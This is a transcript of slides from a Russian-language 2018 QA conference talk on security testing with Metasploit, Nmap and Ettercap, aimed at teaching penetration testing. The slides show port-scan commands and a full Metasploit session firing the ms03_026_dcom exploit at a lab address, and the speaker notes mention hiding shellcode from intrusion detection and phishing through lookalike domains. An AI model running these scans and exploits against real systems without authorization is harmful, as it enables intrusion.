Successfully reported this slideshow.

QA Fest 2018. Святослав Логин. Что такое Metasploit? Как его использовать для проверки безопасности проекта?

1

Share

1 of 49
1 of 49

QA Fest 2018. Святослав Логин. Что такое Metasploit? Как его использовать для проверки безопасности проекта?

1

Share

Ни для кого не секрет, что при разработке проекта мало кто уделяет достаточное внимание проверке безопасности приложения. Даже когда и задумываются об этом, то очень часто упускают из внимания уязвимости железа и ОС, которое коммуницирует с вашим приложением. В своем докладе я расскажу и покажу на что следует обращать внимание при тестировании безопасности вашего продукта. А так же насколько важно применять тестирование безопасности. Ну, и как обычно, свои доклады я сопровождаю не только теорией, но и практическими примерами. На этот раз специальными гостями будут:
- Nmap
- Metasploit
- Ettercap

Ни для кого не секрет, что при разработке проекта мало кто уделяет достаточное внимание проверке безопасности приложения. Даже когда и задумываются об этом, то очень часто упускают из внимания уязвимости железа и ОС, которое коммуницирует с вашим приложением. В своем докладе я расскажу и покажу на что следует обращать внимание при тестировании безопасности вашего продукта. А так же насколько важно применять тестирование безопасности. Ну, и как обычно, свои доклады я сопровождаю не только теорией, но и практическими примерами. На этот раз специальными гостями будут:
- Nmap
- Metasploit
- Ettercap

More Related Content

More from QAFest

Related Books

Free with a 14 day trial from Scribd

See all

Related Audiobooks

Free with a 14 day trial from Scribd

See all

QA Fest 2018. Святослав Логин. Что такое Metasploit? Как его использовать для проверки безопасности проекта?

  1. 1. WITH PASSION TO QUALITY Святослав Логин QA CONFERENCE #1 IN UKRAINE, KYIV 2018 Что такое Metasploit? Как его использовать для проверки безопасности проекта?
  2. 2. О себе: - Святослав Логин - QA Lead в Evo.company - 5 лет в тестировании - 6 проектов
  3. 3. В evo.company входят такие проекты:
  4. 4. Сегодня в программе: - Metasploit - Nmap - Ettercap
  5. 5. Вступление Знакомство с инструментами
  6. 6. Вступление Вступление: Работа злоумышленников Hardware OS Soft WEB Сервер
  7. 7. Вступление: Что такое Metasploit? Metasploit - проект, посвященный информационной безопасности.
  8. 8. Вступление: База Exploit 38.000+ EXPLOITS ● OS ● DB ● Soft ● Hardware
  9. 9. Вступление: Термины
  10. 10. Вступление: Умение Metasploit? ● Проводить установку к shell или VNC cерверу ● Шифровать shellcode, скрывая атаки
  11. 11. Вступление: Способы проникновения Harry!!! I come in ● Метод черного ящика ● Метод белого ящика
  12. 12. Вступление: Ключевые шаги ● Определение цели
  13. 13. Вступление: Ключевые шаги ● Выявление уязвимости
  14. 14. Вступление: Ключевые шаги ● Эксплуатация уязвимости
  15. 15. Вступление: Ключевые шаги ● Отчет
  16. 16. Глава1 Сбор информации о цели
  17. 17. Глава 1: Способы сбора информации Нормальный мужик долго на дороге не валяется ● Пассивный сбор информации
  18. 18. Глава 1: Пассивный сбор информации ● Команда whois
  19. 19. Глава 1: Пассивный сбор информации ● Команда dig
  20. 20. Глава 1: Пассивный сбор информации ● Команда nslookup
  21. 21. Глава 1: Способы сбора информации ● Активный сбор информации
  22. 22. Глава 1: Активный сбор информации Nmap - утилита предназначенная для разнообразного сканирования IP-сетей с любым количеством объектов
  23. 23. Глава 1: Активный сбор информации 1.Команда TCP connect [-sT] 1 nmap -sT -p1-20 test.net 2 Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-16 14:55 EET 3 rDNS record for 193.239.68.38: www.test.net 4 PORT STATE SERVICE 5 1/tcp filtered tcpmux 6 2/tcp filtered compressnet 7 3/tcp filtered unknown
  24. 24. Глава 1: Активный сбор информации 2.Команда UDP scan [-sU] 1 nmap -sU test.net 2 Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-16 14:55 EET 3 rDNS record for 193.239.68.38: www.test.net 4 Not shown: 999 filtered ports 5 PORT STATE SERVICE 6 80/tcp open http 7 Nmap done: 1 IP address (1 host up) scanned in 5.01 seconds
  25. 25. Глава 1: Активный сбор информации 3.Команда ACK scan [-sA] 1 nmap -sА test.net 2 Starting Nmap 5.51SVN ( http://nmap.org ) at 2018-02-16 15:19 EET 3 Nmap scan report for 192.168.56.102 4 Host is up (0.0011s latency). 5 Not shown: 999 filtered ports 6 9001/tcp unfiltered  tor-orport
  26. 26. Глава 1: Активный сбор информации 4.Команда -O 1 nmap -O test.net 2 Starting Nmap 5.51SVN ( http://nmap.org ) at 2018-02-16 15:19 EET 3 Nmap scan report for test.net 4 Host is up (0.0014s latency). 5 MAC Address: 08:00:27:34:A8:87 (Cadmus Computer Systems) 6 Device type: general purpose 7 Running: Microsoft Windows 7
  27. 27. Глава 1: Способы сбора информации ● Социальная инженерия
  28. 28. Глава2 Эксплуатация уязвимости
  29. 29. Глава 3: Эксплуатация Список команд - search exploit - use exploit - set - show targets, options
  30. 30. Глава 2: Запуск Metasploit root@slogin: msfconsole
  31. 31. Глава 2: Эксплуатация 1.Команда search exploit 1 msf > search ms03_026_dcom 2 Matching Modules 3 ================ 4 Name Disclosure Date Rank Description 5 ---- --------------- ---- ----------- 6 exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great Microsoft RPC DCOM
  32. 32. Глава 2: Эксплуатация 2.Команда use 1 msf > use exploit/windows/dcerpc/ms03_026_dcom 2 msf exploit(ms03_026_dcom) >
  33. 33. Глава 2: Эксплуатация 3.Команда show options 1 msf exploit(ms03_026_dcom) > show options 2 Module options (exploit/windows/dcerpc/ms03_026_dcom): 3 Name Current Setting Required Description 4 ---- --------------- -------- ----------- 5 RHOST yes The target address 6 RHOST 125 yes The target port
  34. 34. Глава 2: Эксплуатация 4.Команда set 1 msf exploit(ms03_026_dcom) > set RHOST 102.168.56.102 2 RHOST =>102.168.56.102 3 msf exploit(ms03_026_dcom) >
  35. 35. Глава 2: Эксплуатация 5.Команда show targets 1 msf exploit(ms03_026_dcom) > show targets 2 Exploit targets: 3 Id Name 4 -- ---- 5 0 Windows NT SP3-6a/2000/XP/2003 Universal
  36. 36. Глава 3: Примеры 1 msf exploit(ms03_026_dcom) > exploit 2 [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... 3 [*] Binding to 4d9f4ab8-7d1c-11cf-861e- 0020af6e7c57:0.0@ncacn_ip_tcp:192.168.56.102[135] ... 4 [*] Bound to 4d9f4ab8-7d1c-11cf-861e- 0020af6e7c57:0.0@ncacn_ip_tcp:192.168.56.102[135] ... 5 [*] Sending exploit ... 6 [*] Exploit completed.
  37. 37. Глава3 Практика
  38. 38. Глава 3: Цепочка развитий событий Base DB DBn OS R file W file User Up user Net RAM
  39. 39. Глава4
  40. 40. Глава 4: Как узнать IP Ettercap — это приложение для анализа сетевого трафика, проходящего через интерфейс компьютера, но с дополнительной функциональностью. http://viewdns.info https://iphostinfo.com/
  41. 41. Глава 4: Как узнать IP компа
  42. 42. Глава 4: Как узнать IP компа
  43. 43. Вывод: Как защититься ● Не позволяйте посторонним лицам иметь доступ в вашу сеть ● Помните об угрозе перехвата пароля ● Используйте VPN ● SSL-сертификаты ● Обновляйте все и вся ● Пользуйтесь лицензированным ПО
  44. 44. Вывод: Точка G Security Functionality Usability
  45. 45. ● База exploit - https://www.exploit-db.com/ ● Nmap - https://nmap.org/man/ru/man-port-scanning-techniques.html ● ettercap - https://www.ettercap-project.org/index.html Литература:
  46. 46. Спасибо за внимание! Вопросы? svatogor svyat.login@gmail.com https://svyat.tech/
  47. 47. QA CONFERENCE #1 IN UKRAINE, KYIV 2018 WITH PASSION TO QUALITY svyat.login@gmail.com https://svyat.tech/

Editor's Notes

  • Payload — Это код, который выполняется после успешного выполнения атаки
    Exploit - это код с помощью которого пен-тестер может взломать систему, программу и т.п.
  • Конструировать эксплойты с необходимой в конкретном случае «полезной нагрузкой» (payloads), которая выполняется в случае удачной атаки, например, установка shell или VNC сервера.
    Шифровать шеллкод, что может скрыть факт атаки от IDS или IPS.

    Для проведения атаки необходима информация об установленных на удаленном сервере сервисах и их версии, то есть нужно дополнительное исследование с помощью таких инструментов, как nmap или nessus.
  • Метод черного ящика — осуществляется при отсутствии предварительной информации о цели. Для осуществления атаки, пен-тестеру приходится по крупицам собирать информацию о целевой системе
    Метод белого ящика – осуществляется, когда пен-тестер имеет достаточно полную информацию о цели


  • сбор основной информации без физического соединения
  • реализация различных методов обнаружения, таких как сканирование, удаленный вход (remote login) и сетевые сервисы, чтобы выяснить, какие службы и программное обеспечение, работают на целевой системе.
  • подготовка отчета об уязвимости(ях) и меры противодействия
  • используется для получения информации о цели, не имея физического соединения или доступа к ней. Это значит, что мы используем другие источники информации такие как whois,nslookup и т.д. Допустим наша цель веб-приложение, тогда поиск по whois даст нам много полезного: ip-адрес, домены и под-домны, размещение серверов, хостинг и т.д.
  • логическое соединение (logical connection) с целью. Эта техника дает нам возможность перейти на след. уровень. Сканирование портов – широко используемый метод активного сканирования, в котором концентрируется внимание на сборе информации об открытых портах, доступных служб и т.п.
  • эта техника похожа на пассивный сбор информации, но опирается на человеческие ошибки, распечатки, телефонные звонки, банальную невнимательность и т.д. Например, хакер может зарегистрировать домен похожий на целевой и рассылать от его имени сообщение, что мол перейдите по ссылке, введите логин и пароль. Такие домены называются “злые близнецы”
  • ×